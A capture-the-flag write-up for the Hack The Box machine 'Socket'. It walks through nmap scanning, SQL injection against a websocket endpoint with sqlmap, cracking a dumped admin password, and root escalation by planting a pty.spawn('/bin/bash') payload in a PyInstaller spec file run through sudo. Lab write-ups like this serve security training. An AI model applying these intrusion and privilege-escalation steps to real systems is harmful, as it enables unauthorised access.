Socket

For this machine, I've started to take a lot more screenshots to better explain the steps I'm taking to get the flags.

User flag

Initial nmap:

$ nmap -sC -sV 10.10.11.206
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-05 08:50 CDT
Nmap scan report for 10.10.11.206
Host is up (0.14s latency).
Not shown: 847 closed tcp ports (conn-refused), 151 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://qreader.htb/
Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.49 seconds

It looks like this site is using the address qreader.htb, so add that to /etc/hosts , then go to the site.

This site appears to be a service that converts text to qr codes, and vice versa. I looked at the page source for a bit and proxied traffic through burpsuite, but I didn't find anything particularly insteresting.

This site did offer a local version of the app, which I downloaded and ran. The app performs similar functions to the website, but it has a neat feature--it can check for updates.

Capturing the traffic with tcpdump and opening in wireshark showed that it was sending a request to http://ws.qreader.htb:5789/version over a websocket to check the version.

We can then use wscat to test the websocket and see if there are any vulnerabilities. There's an sql injection vulnerability here:

Manual sqli didn't get me very far, so the next thing I tried is using sqlmap to speed the process up tremendously. As this is a websocket, it will help to use the same proxy used in [[2023-03-11 htb-soccer|Soccer]], with a minor change to escape quotes correctly (use '\\\"' instead of '\'' in the replace function).

I also needed to use --level 5 and --risk 3 to find a result.

We can then dump the database and get the admin password. The password is in the rockyou wordlist, and can be cracked using john.

I attempted to ssh in to the user admin without success, so I had to go back to the database and see if I could find a username:

Looks like the admin is named Thomas Keller, so I started trying different usernames based on that, and got in.

The user flag can then be retrieved.

Root flag

Immediately after getting user access, the first thing to check is what commands we can run using sudo. In this case, it's a custom script: /usr/local/sbin/build-installer.sh. We can read the script to see what it does.

This script is just a wrapper around pyinstaller, which is used to create an executable from a python script. What's interesting is that according to their documentation, the spec file "is actually executable Python code. PyInstaller builds the app by executing the contents of the spec file."

So I created a simple python script to test with and ran it using the installer:

print("Test")

This worked and installed correctly, so I then copied the spec file it generated from /tmp and make a change to it to get a root shell by adding this to the top:

import pty
pty.spawn('/bin/bash')

I then ran the installer script on the spec file, and got the root flag.